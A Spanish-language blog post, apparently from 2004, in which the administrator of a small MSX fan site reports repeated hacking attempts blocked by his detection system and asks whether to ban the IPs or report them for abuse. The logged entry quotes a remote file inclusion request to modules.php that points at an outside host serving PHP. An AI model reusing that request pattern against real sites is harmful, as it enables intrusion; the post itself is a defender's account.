Pues resulta que el SDTMHWM (sistema de detección de tipos malos
hackeadores de webs MSXeras) lleva ya casi toda la semana bloqueando los
infructíferos intentos de algun personaje que intenta hackear el sitio
web. Me pregunto si será el mismo tipo que logró hackearla la primera
vez, cuando no había sistemas de seguridad. La información recogida del
susodicho es la siguiente (la última recibida):
- Date: 27 June 2004, 07:19
- IP Address: 217.160.129.159
- Host: bewegte-bilder.info
- User-agent: curl/7.7.1 (i686-suse-linux) libcurl 7.7.1 (SSL 0.9.6)
(ipv6 enabled)
- URI:
/modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&t=h
ttp://217.59.104.226/
- VAR: $name = http://217.59.104.226/
Si hacéis click en la URL que intenta colar en el paso de parámetros a
los módulos php de hispamsx.org veréis una cadena de texto PHP,
supuestamente para hacer un bypass al chequeo de si el usuario es
administrador, aunque no estoy demasiado seguro...
El susodicho personaje no para de intentarlo día tras día, y aunque el
sistema lo banea, parece que puede seguir acciendo (¿usando el CURL de
Linux?).
Haciendo un WHOIS puede verse que la IP viene de Alemania. La pregunta
es: ¿baneo todas las IP con las que aparezca el susodicho ser sin vida
social? ¿o bien contacto con la dirección para informes de abusos que
aparece en el whois informando de la situacion?
Por otro lado no puedo entender quien tiene interés en hackear una
pequeña web sobre MSX... ¿algún usuario de Spectrum en pie de guerra?
¿tal vez un usuario de Commodore 64? ¿exredactores de la antigua
Micromanía?
